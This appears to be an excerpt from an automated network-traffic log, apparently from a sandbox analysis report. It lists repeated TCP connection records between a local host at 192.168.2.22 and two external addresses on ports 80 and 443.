        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
